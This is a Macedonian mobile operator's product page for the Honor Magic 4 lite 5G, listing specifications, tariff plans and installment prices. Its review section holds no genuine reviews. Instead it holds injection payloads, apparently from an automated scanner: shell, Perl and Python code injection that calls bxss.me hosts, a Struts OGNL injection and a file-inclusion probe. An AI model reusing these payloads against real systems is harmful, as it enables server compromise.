Мобилна

Honor Magic 4 lite 5G

Со новиот Honor Magic 4 lite 5G добивате супер голем дисплеј во кој е имплементирана FHD екран, а воедно и освежување на слика со брзина и до 120 Hz. Опцијата за супербрзо полнење овозможува батеријата да биде наполнета и до 81% за само 30 минути. Со својата главна камера од 48МР ќе може да направите неверојатни слики, а истите може да ги зачувате во внатрешната меморија со капацитет од 128 GB.

Прочитај повеќе
Octa-core
48+2+2MP rear + 16MP front
4800 mAh
6GB / 128GB
6.81" TFT LCD
онлајн попуст 5.000 ден.
Ограничени количини
достапен
онлајн недостапен
Одбери боја

Достапно во ограничени количини

достапен

онлајн недостапен

Тарифа
A1 Nova M
Промени тарифа
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.
Цена

459 ден. x 24 рати

249 ден. x 24 рати

Бесплатна достава

Сакате да знаете кога ќе има залиха?

Ограничени количини
достапен
онлајн недостапен

A1 Nova XS

499 ден./мес.

 
 
2GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
 
 
  

Цена за Honor Magic 4 lite 5G

583 ден. x 24 рати
Одбери

A1 Nova S

899 ден./мес.

10GB
 
20GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

416 ден. x 24 рати
Одбери

A1 Nova M

1.099 ден./мес.

Препорачана тарифа
5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

249 ден. x 24 рати
Одбрано

A1 Nova L

1.299 ден./мес.

5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

124 ден. x 24 рати
Одбери

A1 Neon+

999 ден./мес.

15GB
 
неограничен
 
национален интернет 
A1 Net Sef
 
со можност за размена 
  
Неограничени
 
минути и SMS 
  
  
  
  

Цена за Honor Magic 4 lite 5G

374 ден. x 24 рати
Одбери
Одберете тарифа
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

Honor Magic 4 lite 5G

Цена на уредот во тарифа
Тарифа
Времетраење на договор
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.

A1 Nova XS

499 ден./мес.

 
 
2GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
 
 
  

Цена за Honor Magic 4 lite 5G

583 ден. x 24 рати
Одбери

A1 Nova XS SIM

449 ден./мес.

 
 
2GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 

Цена за Honor Magic 4 lite 5G

/

A1 Nova S SIM

799 ден./мес.

10GB
 
20GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  

Цена за Honor Magic 4 lite 5G

/

A1 Nova S

899 ден./мес.

10GB
 
20GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

416 ден. x 24 рати
Одбери

A1 Nova M SIM

999 ден./мес.

5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  

Цена за Honor Magic 4 lite 5G

/

A1 Nova M

1.099 ден./мес.

Препорачана тарифа
5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

249 ден. x 24 рати
Одбрано

A1 Nova L SIM

1.099 ден./мес.

5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  

Цена за Honor Magic 4 lite 5G

/

A1 Nova L

1.299 ден./мес.

5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

124 ден. x 24 рати
Одбери

A1 Nova XL

1.599 ден./мес.

5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  
 
 
  
  

Цена за Honor Magic 4 lite 5G

209 ден. x 24 рати
Одбери

A1 Nova XL SIM

1.399 ден./мес.

5G Ready
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  

Цена за Honor Magic 4 lite 5G

/

A1 Neon SIM

649 ден./мес.

10GB
 
15GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
минути и SMS 
  
Неограничен интернет
 
секоја вечер од 
00:00ч до 06:00ч 

Цена за Honor Magic 4 lite 5G

/

A1 Neon

799 ден./мес.

10GB
 
15GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
минути и SMS 
  
Неограничен интернет
 
секоја вечер од 
00:00ч до 06:00ч 

Цена за Honor Magic 4 lite 5G

458 ден. x 24 рати
Одбери

A1 Neon+

999 ден./мес.

15GB
 
неограничен
 
национален интернет 
A1 Net Sef
 
со можност за размена 
  
Неограничени
 
минути и SMS 
  
  
  
  

Цена за Honor Magic 4 lite 5G

374 ден. x 24 рати
Одбери

A1 Neon+ SIM

799 ден./мес.

15GB
 
неограничен
 
национален интернет 
A1 Net Sef
 
со можност за размена 
  
Неограничени
 
минути и SMS 
  
  
  
  

Цена за Honor Magic 4 lite 5G

/

A1 Senior

299 ден./мес.

 
 
500MB
 
национален интернет 
Неограничено
 
минути кон A1 
  
50
 
Минути кон останати нац. 
мрежи (фиксни/мобилни) 
50
 
SМЅ кон сите 
национални мрежи 

Цена за Honor Magic 4 lite 5G

/
Основна цена
20.999денари
Припејд
22.999денари
Цена само за уред
22.999денари

Одбери

Honor Magic 4 lite 5G

Што има во кутијата?
  • Honor Magic 4 lite 5G
  • Адаптер & USB Type-C
  • Упатство за употреба
  • Гарантен лист
Основни карактеристики
  • Octa-core
  • 48+2+2MP rear + 16MP front
  • 4800 mAh
  • 6GB / 128GB
  • 6.81" TFT LCD
166.07 мм
166.07 мм
166.07 мм
Детални карактеристики
Мрежа GSM/HSPA/LTE/5G
Тип на SIM Dual Nano SIM
Екран TFT LCD (1080 x 2388)
Големина на екранот 6.81"
Камера 48+2+2MP
Оперативен систем Android
CPU Octa-core Qualcomm 778G 5G
Вградена меморија 128 GB
RAM меморија 6 GB
Батерија Li-po 4800 mAh
Македонско мени Yes
Телефонот работи само со А1 SIM картичка No
Предна камера 16MP
Димензии 166.07 x 75.78 x 8.05 mm
Тежина 189g
Гаранција 24
Гаранција и сервис
24
месецигаранција од производител
Овластен сервисер за овој уред

Доколку имате потреба од сервис за Вашиот Honor Magic 4 lite 5G, контактирајте го овластениот сервисер.

Honor Magic 4 lite 5G

Оценка од корисници

Има вкупно 8 рецензии за овој уред

2
3
3
0
0
3.9
".gethostbyname(lc("hitet"."mmeobrfya06ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(67).chr(104).chr(75)."
17.07.2022

Дали Ви помогна оваа рецензија?
;(nslookup hitukkwwctjebb5d68.bxss.me||perl -e "gethostbyname('hitukkwwctjebb5d68.bxss.me')")|(nslookup hitukkwwctjebb5d68.bxss.me||perl -e "gethostbyname('hitukkwwctjebb5d68.bxss.me')")&(nslookup hitukkwwctjebb5d68.bxss.me||perl -e "gethostbyname('hitukkw
17.07.2022

Дали Ви помогна оваа рецензија?
`(nslookup hitbrqpkagxyz02b04.bxss.me||perl -e "gethostbyname('hitbrqpkagxyz02b04.bxss.me')")`
17.07.2022

Дали Ви помогна оваа рецензија?
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitwxxsxrykpvdd0ab."+"bxss.me")+'
17.07.2022

Дали Ви помогна оваа рецензија?
QPbmCRVM%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUt
17.07.2022

Дали Ви помогна оваа рецензија?
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitgdloggnwxn33991."+"bxss.me")+'
17.07.2022

Дали Ви помогна оваа рецензија?
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
17.07.2022

Дали Ви помогна оваа рецензија?
QPbmCRVM%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUt
17.07.2022

Дали Ви помогна оваа рецензија?